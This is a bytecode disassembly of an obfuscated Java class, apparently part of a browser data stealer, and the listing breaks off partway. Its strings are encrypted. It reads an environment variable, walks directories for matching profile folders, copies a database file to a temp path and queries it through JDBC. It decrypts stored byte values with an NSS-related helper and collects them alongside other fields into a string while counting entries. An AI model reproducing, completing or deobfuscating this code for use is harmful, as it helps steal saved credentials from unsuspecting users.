Compiled from "e.java"
public class a.b.d.e {
  private static final java.lang.String o;

  private static int s;

  private static int g;

  private static int r;

  private static int C;

  private static final java.lang.String[] a;

  private static final java.lang.String[] b;

  private static final long[] c;

  private static final java.lang.Long[] d;

  public a.b.d.e();
    Code:
         0: aload_0
         1: invokespecial #227                // Method java/lang/Object."<init>":()V
         4: return

  public static void r();
    Code:
         0: ldc2_w        #374                // long 42902833617893l
         3: lstore_0
         4: lload_0
         5: dup2
         6: ldc2_w        #382                // long 100982578467847l
         9: lxor
        10: lstore_2
        11: pop2
        12: iconst_0
        13: putstatic     #36                 // Field s:I
        16: iconst_0
        17: putstatic     #328                // Field g:I
        20: iconst_0
        21: putstatic     #117                // Field r:I
        24: iconst_0
        25: putstatic     #145                // Field C:I
        28: ldc           #17                 // int 405268440
        30: sipush        12234
        33: iadd
        34: ldc           #12                 // int -405268440
        36: sipush        -15136
        39: iadd
        40: lload_0
        41: l2i
        42: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
        45: invokestatic  #357                // Method a/b/d/dec.k:(Ljava/lang/String;)V
        48: ldc           #17                 // int 405268440
        50: sipush        12224
        53: iadd
        54: ldc           #12                 // int -405268440
        56: sipush        -14242
        59: iadd
        60: lload_0
        61: l2i
        62: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
        65: invokestatic  #237                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
        68: ldc           #17                 // int 405268440
        70: sipush        12233
        73: iadd
        74: ldc           #17                 // int 405268440
        76: sipush        6446
        79: iadd
        80: lload_0
        81: l2i
        82: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
        85: invokedynamic #219,  0            // InvokeDynamic #0:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
        90: astore        4
        92: aload         4
        94: ldc           #17                 // int 405268440
        96: sipush        12237
        99: iadd
       100: ldc           #17                 // int 405268440
       102: sipush        26727
       105: iadd
       106: lload_0
       107: l2i
       108: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       111: invokestatic  #302                // Method a/b/d/dec.g:(Ljava/lang/String;Ljava/lang/String;)V
       114: aload         4
       116: lload_2
       117: iconst_2
       118: anewarray     #138                // class java/lang/Object
       121: dup_x2
       122: dup_x2
       123: pop
       124: invokestatic  #116                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       127: iconst_1
       128: swap
       129: aastore
       130: dup_x1
       131: swap
       132: iconst_0
       133: swap
       134: aastore
       135: invokestatic  #40                 // Method h:([Ljava/lang/Object;)V
       138: ldc           #17                 // int 405268440
       140: sipush        12241
       143: iadd
       144: ldc           #17                 // int 405268440
       146: sipush        13666
       149: iadd
       150: lload_0
       151: l2i
       152: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       155: ldc           #17                 // int 405268440
       157: sipush        12247
       160: iadd
       161: ldc           #17                 // int 405268440
       163: sipush        18417
       166: iadd
       167: lload_0
       168: l2i
       169: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       172: getstatic     #36                 // Field s:I
       175: invokestatic  #30                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       178: ldc           #17                 // int 405268440
       180: sipush        12223
       183: iadd
       184: ldc           #12                 // int -405268440
       186: sipush        -24727
       189: iadd
       190: lload_0
       191: l2i
       192: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       195: ldc           #17                 // int 405268440
       197: sipush        12248
       200: iadd
       201: ldc           #17                 // int 405268440
       203: sipush        7633
       206: iadd
       207: lload_0
       208: l2i
       209: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       212: getstatic     #328                // Field g:I
       215: invokestatic  #30                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       218: ldc           #17                 // int 405268440
       220: sipush        12223
       223: iadd
       224: ldc           #12                 // int -405268440
       226: sipush        -24727
       229: iadd
       230: lload_0
       231: l2i
       232: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       235: ldc           #17                 // int 405268440
       237: sipush        12226
       240: iadd
       241: ldc           #12                 // int -405268440
       243: sipush        -21373
       246: iadd
       247: lload_0
       248: l2i
       249: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       252: getstatic     #117                // Field r:I
       255: invokestatic  #30                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       258: ldc           #17                 // int 405268440
       260: sipush        12223
       263: iadd
       264: ldc           #12                 // int -405268440
       266: sipush        -24727
       269: iadd
       270: lload_0
       271: l2i
       272: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       275: ldc           #17                 // int 405268440
       277: sipush        12221
       280: iadd
       281: ldc           #17                 // int 405268440
       283: sipush        -31105
       286: i2c
       287: iadd
       288: lload_0
       289: l2i
       290: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       293: getstatic     #145                // Field C:I
       296: invokestatic  #30                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       299: return

  private static void h(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #270                // class java/lang/String
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #304                // class java/lang/Long
        14: invokevirtual #80                 // Method java/lang/Long.longValue:()J
        17: lstore_2
        18: pop
        19: lload_2
        20: dup2
        21: ldc2_w        #366                // long 58146877246110l
        24: lxor
        25: lstore        4
        27: pop2
        28: getstatic     #344                // Field a/b/d/dec$NssSec.m:Z
        31: new           #247                // class java/io/File
        34: dup
        35: aload_1
        36: invokespecial #60                 // Method java/io/File."<init>":(Ljava/lang/String;)V
        39: astore        7
        41: istore        6
        43: aload         7
        45: iload         6
        47: ifne          64
        50: invokevirtual #64                 // Method java/io/File.exists:()Z
        53: ifne          62
        56: goto          60
        59: athrow
        60: return
        61: athrow
        62: aload         7
        64: invokevirtual #246                // Method java/io/File.listFiles:()[Ljava/io/File;
        67: astore        8
        69: aload         8
        71: iload         6
        73: ifne          86
        76: ifnonnull     84
        79: goto          83
        82: athrow
        83: return
        84: aload         8
        86: astore        9
        88: aload         9
        90: arraylength
        91: istore        10
        93: iconst_0
        94: istore        11
        96: iload         11
        98: iload         10
       100: if_icmpge     286
       103: aload         9
       105: iload         11
       107: aaload
       108: astore        12
       110: iload         6
       112: lload_2
       113: lconst_0
       114: lcmp
       115: ifle          283
       118: ifne          281
       121: aload         12
       123: invokevirtual #53                 // Method java/io/File.isDirectory:()Z
       126: ifeq          278
       129: goto          133
       132: athrow
       133: aload         12
       135: iload         6
       137: ifne          236
       140: goto          144
       143: athrow
       144: lload_2
       145: lconst_0
       146: lcmp
       147: ifle          232
       150: invokevirtual #301                // Method java/io/File.getName:()Ljava/lang/String;
       153: ldc           #10                 // int -828362400
       155: sipush        -28077
       158: iadd
       159: ldc           #10                 // int -828362400
       161: sipush        -23396
       164: i2c
       165: ineg
       166: iadd
       167: lload_2
       168: l2i
       169: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       172: invokevirtual #243                // Method java/lang/String.equals:(Ljava/lang/Object;)Z
       175: ifne          230
       178: goto          182
       181: athrow
       182: lload_2
       183: lconst_0
       184: lcmp
       185: iflt          273
       188: aload         12
       190: iload         6
       192: ifne          236
       195: goto          199
       198: athrow
       199: invokevirtual #301                // Method java/io/File.getName:()Ljava/lang/String;
       202: ldc           #10                 // int -828362400
       204: sipush        -28105
       207: iadd
       208: ldc           #15                 // int 828362400
       210: sipush        -23569
       213: i2c
       214: iadd
       215: lload_2
       216: l2i
       217: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       220: invokevirtual #297                // Method java/lang/String.startsWith:(Ljava/lang/String;)Z
       223: ifeq          278
       226: goto          230
       229: athrow
       230: aload         12
       232: goto          236
       235: athrow
       236: lload         4
       238: iconst_2
       239: anewarray     #138                // class java/lang/Object
       242: dup_x2
       243: dup_x2
       244: pop
       245: invokestatic  #116                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       248: iconst_1
       249: swap
       250: aastore
       251: dup_x1
       252: swap
       253: iconst_0
       254: swap
       255: aastore
       256: invokestatic  #257                // Method q:([Ljava/lang/Object;)V
       259: sipush        21658
       262: ldc2_w        #370                // long 1335548363527945229l
       265: lload_2
       266: lxor
       267: invokestatic  #89                 // Method a:(IJ)J
       270: invokestatic  #242                // Method java/lang/Thread.sleep:(J)V
       273: goto          278
       276: astore        13
       278: iinc          11, 1
       281: iload         6
       283: ifeq          96
       286: return
      Exception table:
         from    to  target type
           199   232   235   Class java/lang/Exception
           182   226   229   Class java/lang/Exception
           144   195   198   Class java/lang/Exception
           133   178   181   Class java/lang/Exception
           121   140   143   Class java/lang/Exception
           110   129   132   Class java/lang/Exception
            69    79    82   Class java/lang/Exception
            50    61    61   Class java/lang/Exception
            43    56    59   Class java/lang/Exception
           259   273   276   Class java/lang/Exception

  private static void q(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #247                // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #304                // class java/lang/Long
        14: invokevirtual #80                 // Method java/lang/Long.longValue:()J
        17: lstore_2
        18: pop
        19: lload_2
        20: dup2
        21: ldc2_w        #380                // long 9102958455795l
        24: lxor
        25: lstore        4
        27: pop2
        28: getstatic     #344                // Field a/b/d/dec$NssSec.m:Z
        31: aload_1
        32: invokevirtual #301                // Method java/io/File.getName:()Ljava/lang/String;
        35: astore        7
        37: istore        6
        39: new           #247                // class java/io/File
        42: dup
        43: aload_1
        44: ldc           #16                 // int -1855426920
        46: sipush        -9573
        49: i2c
        50: ineg
        51: isub
        52: ldc           #11                 // int 1855426920
        54: sipush        -3967
        57: i2c
        58: isub
        59: lload_2
        60: l2i
        61: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
        64: invokespecial #295                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        67: iload         6
        69: ifne          641
        72: invokevirtual #64                 // Method java/io/File.exists:()Z
        75: ifne          165
        78: new           #247                // class java/io/File
        81: dup
        82: aload_1
        83: ldc           #16                 // int -1855426920
        85: sipush        -9578
        88: i2c
        89: ineg
        90: isub
        91: ldc           #16                 // int -1855426920
        93: sipush        -10376
        96: i2c
        97: ineg
        98: isub
        99: lload_2
       100: l2i
       101: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       104: invokespecial #295                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       107: iload         6
       109: ifne          641
       112: invokevirtual #64                 // Method java/io/File.exists:()Z
       115: ifne          165
       118: new           #247                // class java/io/File
       121: dup
       122: aload_1
       123: ldc           #16                 // int -1855426920
       125: sipush        -9588
       128: i2c
       129: ineg
       130: isub
       131: ldc           #16                 // int -1855426920
       133: sipush        -20398
       136: i2c
       137: ineg
       138: isub
       139: lload_2
       140: l2i
       141: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       144: invokespecial #295                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       147: iload         6
       149: lload_2
       150: lconst_0
       151: lcmp
       152: iflt          649
       155: ifne          641
       158: invokevirtual #64                 // Method java/io/File.exists:()Z
       161: ifne          165
       164: return
       165: aload_1
       166: ldc           #16                 // int -1855426920
       168: sipush        -9622
       171: i2c
       172: ineg
       173: isub
       174: ldc           #11                 // int 1855426920
       176: sipush        -19723
       179: i2c
       180: isub
       181: lload_2
       182: l2i
       183: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       186: ldc           #16                 // int -1855426920
       188: sipush        -9585
       191: i2c
       192: ineg
       193: isub
       194: ldc           #16                 // int -1855426920
       196: sipush        -21652
       199: i2c
       200: ineg
       201: isub
       202: lload_2
       203: l2i
       204: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       207: lload         4
       209: aload         7
       211: ldc           #16                 // int -1855426920
       213: sipush        -9566
       216: i2c
       217: ineg
       218: isub
       219: ldc           #16                 // int -1855426920
       221: sipush        -16793
       224: i2c
       225: ineg
       226: isub
       227: lload_2
       228: l2i
       229: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       232: iconst_1
       233: bipush        7
       235: anewarray     #138                // class java/lang/Object
       238: dup_x1
       239: swap
       240: invokestatic  #170                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       243: bipush        6
       245: swap
       246: aastore
       247: dup_x1
       248: swap
       249: iconst_5
       250: swap
       251: aastore
       252: dup_x1
       253: swap
       254: iconst_4
       255: swap
       256: aastore
       257: dup_x2
       258: dup_x2
       259: pop
       260: invokestatic  #116                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       263: iconst_3
       264: swap
       265: aastore
       266: dup_x1
       267: swap
       268: iconst_2
       269: swap
       270: aastore
       271: dup_x1
       272: swap
       273: iconst_1
       274: swap
       275: aastore
       276: dup_x1
       277: swap
       278: iconst_0
       279: swap
       280: aastore
       281: invokestatic  #84                 // Method p:([Ljava/lang/Object;)V
       284: aload_1
       285: ldc           #16                 // int -1855426920
       287: sipush        -9595
       290: i2c
       291: ineg
       292: isub
       293: ldc           #16                 // int -1855426920
       295: sipush        -16757
       298: i2c
       299: ineg
       300: isub
       301: lload_2
       302: l2i
       303: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       306: ldc           #16                 // int -1855426920
       308: sipush        -9596
       311: i2c
       312: ineg
       313: isub
       314: ldc           #14                 // int 1855295850
       316: sipush        -1939
       319: i2c
       320: iadd
       321: lload_2
       322: l2i
       323: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       326: lload         4
       328: aload         7
       330: ldc           #16                 // int -1855426920
       332: sipush        -9582
       335: i2c
       336: ineg
       337: isub
       338: ldc           #20                 // int -1855295850
       340: sipush        -3740
       343: i2c
       344: ineg
       345: iadd
       346: lload_2
       347: l2i
       348: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       351: iconst_2
       352: bipush        7
       354: anewarray     #138                // class java/lang/Object
       357: dup_x1
       358: swap
       359: invokestatic  #170                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       362: bipush        6
       364: swap
       365: aastore
       366: dup_x1
       367: swap
       368: iconst_5
       369: swap
       370: aastore
       371: dup_x1
       372: swap
       373: iconst_4
       374: swap
       375: aastore
       376: dup_x2
       377: dup_x2
       378: pop
       379: invokestatic  #116                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       382: iconst_3
       383: swap
       384: aastore
       385: dup_x1
       386: swap
       387: iconst_2
       388: swap
       389: aastore
       390: dup_x1
       391: swap
       392: iconst_1
       393: swap
       394: aastore
       395: dup_x1
       396: swap
       397: iconst_0
       398: swap
       399: aastore
       400: invokestatic  #84                 // Method p:([Ljava/lang/Object;)V
       403: aload_1
       404: ldc           #16                 // int -1855426920
       406: sipush        -9614
       409: i2c
       410: ineg
       411: isub
       412: ldc           #11                 // int 1855426920
       414: sipush        -9899
       417: i2c
       418: isub
       419: lload_2
       420: l2i
       421: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       424: ldc           #16                 // int -1855426920
       426: sipush        -9561
       429: i2c
       430: ineg
       431: isub
       432: ldc           #16                 // int -1855426920
       434: sipush        -14511
       437: i2c
       438: ineg
       439: isub
       440: lload_2
       441: l2i
       442: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       445: lload         4
       447: aload         7
       449: ldc           #16                 // int -1855426920
       451: sipush        -9569
       454: i2c
       455: ineg
       456: isub
       457: ldc           #16                 // int -1855426920
       459: sipush        -19726
       462: i2c
       463: ineg
       464: isub
       465: lload_2
       466: l2i
       467: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       470: iconst_3
       471: bipush        7
       473: anewarray     #138                // class java/lang/Object
       476: dup_x1
       477: swap
       478: invokestatic  #170                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       481: bipush        6
       483: swap
       484: aastore
       485: dup_x1
       486: swap
       487: iconst_5
       488: swap
       489: aastore
       490: dup_x1
       491: swap
       492: iconst_4
       493: swap
       494: aastore
       495: dup_x2
       496: dup_x2
       497: pop
       498: invokestatic  #116                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       501: iconst_3
       502: swap
       503: aastore
       504: dup_x1
       505: swap
       506: iconst_2
       507: swap
       508: aastore
       509: dup_x1
       510: swap
       511: iconst_1
       512: swap
       513: aastore
       514: dup_x1
       515: swap
       516: iconst_0
       517: swap
       518: aastore
       519: invokestatic  #84                 // Method p:([Ljava/lang/Object;)V
       522: aload_1
       523: ldc           #16                 // int -1855426920
       525: sipush        -9613
       528: i2c
       529: ineg
       530: isub
       531: ldc           #11                 // int 1855426920
       533: sipush        -6960
       536: i2c
       537: isub
       538: lload_2
       539: l2i
       540: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       543: ldc           #16                 // int -1855426920
       545: sipush        -9577
       548: i2c
       549: ineg
       550: isub
       551: ldc           #14                 // int 1855295850
       553: sipush        -3324
       556: i2c
       557: iadd
       558: lload_2
       559: l2i
       560: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       563: lload         4
       565: aload         7
       567: ldc           #16                 // int -1855426920
       569: sipush        -9571
       572: i2c
       573: ineg
       574: isub
       575: ldc           #16                 // int -1855426920
       577: sipush        -8910
       580: i2c
       581: ineg
       582: isub
       583: lload_2
       584: l2i
       585: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       588: iconst_5
       589: bipush        7
       591: anewarray     #138                // class java/lang/Object
       594: dup_x1
       595: swap
       596: invokestatic  #170                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       599: bipush        6
       601: swap
       602: aastore
       603: dup_x1
       604: swap
       605: iconst_5
       606: swap
       607: aastore
       608: dup_x1
       609: swap
       610: iconst_4
       611: swap
       612: aastore
       613: dup_x2
       614: dup_x2
       615: pop
       616: invokestatic  #116                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       619: iconst_3
       620: swap
       621: aastore
       622: dup_x1
       623: swap
       624: iconst_2
       625: swap
       626: aastore
       627: dup_x1
       628: swap
       629: iconst_1
       630: swap
       631: aastore
       632: dup_x1
       633: swap
       634: iconst_0
       635: swap
       636: aastore
       637: invokestatic  #84                 // Method p:([Ljava/lang/Object;)V
       640: aload_1
       641: ldc           #16                 // int -1855426920
       643: sipush        -9587
       646: i2c
       647: ineg
       648: isub
       649: ldc           #11                 // int 1855426920
       651: sipush        -15258
       654: i2c
       655: isub
       656: lload_2
       657: l2i
       658: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       661: ldc           #16                 // int -1855426920
       663: sipush        -9574
       666: i2c
       667: ineg
       668: isub
       669: ldc           #16                 // int -1855426920
       671: sipush        -13944
       674: i2c
       675: ineg
       676: isub
       677: lload_2
       678: l2i
       679: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       682: lload         4
       684: aload         7
       686: ldc           #16                 // int -1855426920
       688: sipush        -9586
       691: i2c
       692: ineg
       693: isub
       694: ldc           #16                 // int -1855426920
       696: sipush        -22574
       699: i2c
       700: ineg
       701: isub
       702: lload_2
       703: l2i
       704: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       707: iconst_4
       708: bipush        7
       710: anewarray     #138                // class java/lang/Object
       713: dup_x1
       714: swap
       715: invokestatic  #170                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       718: bipush        6
       720: swap
       721: aastore
       722: dup_x1
       723: swap
       724: iconst_5
       725: swap
       726: aastore
       727: dup_x1
       728: swap
       729: iconst_4
       730: swap
       731: aastore
       732: dup_x2
       733: dup_x2
       734: pop
       735: invokestatic  #116                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       738: iconst_3
       739: swap
       740: aastore
       741: dup_x1
       742: swap
       743: iconst_2
       744: swap
       745: aastore
       746: dup_x1
       747: swap
       748: iconst_1
       749: swap
       750: aastore
       751: dup_x1
       752: swap
       753: iconst_0
       754: swap
       755: aastore
       756: invokestatic  #84                 // Method p:([Ljava/lang/Object;)V
       759: return

  private static void p(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #247                // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #270                // class java/lang/String
        14: astore_2
        15: dup
        16: iconst_2
        17: aaload
        18: checkcast     #270                // class java/lang/String
        21: astore_3
        22: dup
        23: iconst_3
        24: aaload
        25: checkcast     #304                // class java/lang/Long
        28: invokevirtual #80                 // Method java/lang/Long.longValue:()J
        31: lstore        4
        33: dup
        34: iconst_4
        35: aaload
        36: checkcast     #270                // class java/lang/String
        39: astore        6
        41: dup
        42: iconst_5
        43: aaload
        44: checkcast     #270                // class java/lang/String
        47: astore        7
        49: dup
        50: bipush        6
        52: aaload
        53: checkcast     #256                // class java/lang/Integer
        56: invokevirtual #24                 // Method java/lang/Integer.intValue:()I
        59: istore        8
        61: pop
        62: getstatic     #344                // Field a/b/d/dec$NssSec.m:Z
        65: new           #247                // class java/io/File
        68: dup
        69: aload_1
        70: aload_2
        71: invokespecial #295                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        74: astore        10
        76: istore        9
        78: aload         10
        80: invokevirtual #64                 // Method java/io/File.exists:()Z
        83: iload         9
        85: ifne          156
        88: ifne          142
        91: goto          95
        94: athrow
        95: iload         8
        97: iload         9
        99: ifne          156
       102: goto          106
       105: athrow
       106: iconst_2
       107: if_icmpne     142
       110: goto          114
       113: athrow
       114: new           #247                // class java/io/File
       117: dup
       118: aload_1
       119: ldc           #1                  // int -470541300
       121: sipush        -31000
       124: iadd
       125: ldc           #1                  // int -470541300
       127: sipush        -28417
       130: iadd
       131: lload         4
       133: l2i
       134: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       137: invokespecial #295                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       140: astore        10
       142: aload         10
       144: iload         9
       146: ifne          194
       149: invokevirtual #64                 // Method java/io/File.exists:()Z
       152: goto          156
       155: athrow
       156: ifne          160
       159: return
       160: new           #247                // class java/io/File
       163: dup
       164: ldc           #1                  // int -470541300
       166: sipush        -31045
       169: iadd
       170: ldc           #1                  // int -470541300
       172: sipush        -25948
       175: iadd
       176: lload         4
       178: l2i
       179: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       182: invokestatic  #63                 // Method java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
       185: invokestatic  #335                // Method java/util/UUID.randomUUID:()Ljava/util/UUID;
       188: invokevirtual #72                 // Method java/util/UUID.toString:()Ljava/lang/String;
       191: invokespecial #332                // Method java/io/File."<init>":(Ljava/lang/String;Ljava/lang/String;)V
       194: astore        11
       196: aload         10
       198: iload         9
       200: ifne          245
       203: aload         11
       205: ldc           #1                  // int -470541300
       207: sipush        -30998
       210: iadd
       211: ldc           #6                  // int 470541300
       213: sipush        19965
       216: iadd
       217: lload         4
       219: l2i
       220: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       223: invokestatic  #173                // Method a/b/d/dec.cp:(Ljava/io/File;Ljava/io/File;Ljava/lang/String;)Z
       226: lload         4
       228: lconst_0
       229: lcmp
       230: ifle          241
       233: ifne          243
       236: aload         11
       238: invokevirtual #282                // Method java/io/File.delete:()Z
       241: pop
       242: return
       243: aload         11
       245: invokevirtual #212                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       248: ldc           #1                  // int -470541300
       250: sipush        -31034
       253: iadd
       254: ldc           #6                  // int 470541300
       256: sipush        29673
       259: iadd
       260: lload         4
       262: l2i
       263: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       266: swap
       267: invokedynamic #233,  0            // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       272: invokestatic  #329                // Method java/sql/DriverManager.getConnection:(Ljava/lang/String;)Ljava/sql/Connection;
       275: astore        12
       277: aload         12
       279: invokeinterface #62,  1           // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       284: astore        13
       286: aload         13
       288: aload_3
       289: invokeinterface #157,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       294: astore        14
       296: new           #312                // class java/lang/StringBuilder
       299: dup
       300: invokespecial #163                // Method java/lang/StringBuilder."<init>":()V
       303: astore        15
       305: iload         8
       307: iconst_5
       308: iload         9
       310: ifne          852
       313: if_icmpne     836
       316: goto          320
       319: athrow
       320: new           #197                // class java/util/HashMap
       323: dup
       324: invokespecial #262                // Method java/util/HashMap."<init>":()V
       327: astore        16
       329: aload         12
       331: invokeinterface #62,  1           // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       336: ldc           #1                  // int -470541300
       338: sipush        -30990
       341: iadd
       342: ldc           #1                  // int -470541300
       344: sipush        -32206
       347: i2c
       348: ineg
       349: iadd
       350: lload         4
       352: l2i
       353: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       356: invokeinterface #157,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       361: astore        17
       363: aload         17
       365: invokeinterface #230,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       370: ifeq          443
       373: aload         17
       375: iconst_2
       376: invokeinterface #275,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       381: invokestatic  #169                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       384: astore        18
       386: aload         18
       388: iload         9
       390: lload         4
       392: lconst_0
       393: lcmp
       394: ifle          402
       397: ifne          1832
       400: iload         9
       402: ifne          437
       405: goto          409
       408: athrow
       409: ifnull        438
       412: goto          416
       415: athrow
       416: aload         16
       418: aload         17
       420: iconst_1
       421: invokeinterface #179,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       426: aload         18
       428: invokeinterface #68,  3           // InterfaceMethod java/util/Map.put:(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
       433: goto          437
       436: athrow
       437: pop
       438: iload         9
       440: ifeq          363
       443: lload         4
       445: lconst_0
       446: lcmp
       447: iflt          478
       450: aload         17
       452: iload         9
       454: lload         4
       456: lconst_0
       457: lcmp
       458: iflt          376
       461: ifne          473
       464: ifnull        526
       467: goto          471
       470: athrow
       471: aload         17
       473: invokeinterface #284,  1          // InterfaceMethod java/sql/ResultSet.close:()V
       478: goto          526
       481: astore        18
       483: lload         4
       485: lconst_0
       486: lcmp
       487: ifle          511
       490: aload         17
       492: iload         9
       494: ifne          506
       497: ifnull        523
       500: goto          504
       503: athrow
       504: aload         17
       506: invokeinterface #284,  1          // InterfaceMethod java/sql/ResultSet.close:()V
       511: goto          523
       514: astore        19
       516: aload         18
       518: aload         19
       520: invokevirtual #137                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
       523: aload         18
       525: athrow
       526: goto          531
       529: astore        17
       531: aload         14
       533: invokeinterface #230,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       538: ifeq          817
       541: aload         14
       543: iconst_5
       544: invokeinterface #275,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       549: invokestatic  #169                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       552: astore        17
       554: iload         9
       556: lload         4
       558: lconst_0
       559: lcmp
       560: ifle          736
       563: ifne          714
       566: aload         17
       568: iload         9
       570: ifne          1832
       573: goto          577
       576: athrow
       577: ifnull        812
       580: goto          584
       583: athrow
       584: getstatic     #145                // Field C:I
       587: iconst_1
       588: iadd
       589: putstatic     #145                // Field C:I
       592: aload         15
       594: ldc           #1                  // int -470541300
       596: sipush        -31007
       599: iadd
       600: ldc           #1                  // int -470541300
       602: sipush        -24645
       605: iadd
       606: lload         4
       608: l2i
       609: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       612: invokevirtual #79                 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       615: aload         14
       617: iconst_2
       618: invokeinterface #179,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       623: invokevirtual #79                 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       626: ldc           #1                  // int -470541300
       628: sipush        -31033
       631: iadd
       632: ldc           #6                  // int 470541300
       634: sipush        14447
       637: iadd
       638: lload         4
       640: l2i
       641: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       644: invokevirtual #79                 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       647: aload         17
       649: invokevirtual #79                 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       652: ldc           #1                  // int -470541300
       654: sipush        -31009
       657: iadd
       658: ldc           #1                  // int -470541300
       660: sipush        -7766
       663: iadd
       664: lload         4
       666: l2i
       667: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       670: invokevirtual #79                 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       673: aload         14
       675: iconst_3
       676: invokeinterface #179,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       681: invokevirtual #79                 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       684: ldc           #2                  // String /
       686: invokevirtual #79                 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       689: aload         14
       691: iconst_4
       692: invokeinterface #179,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
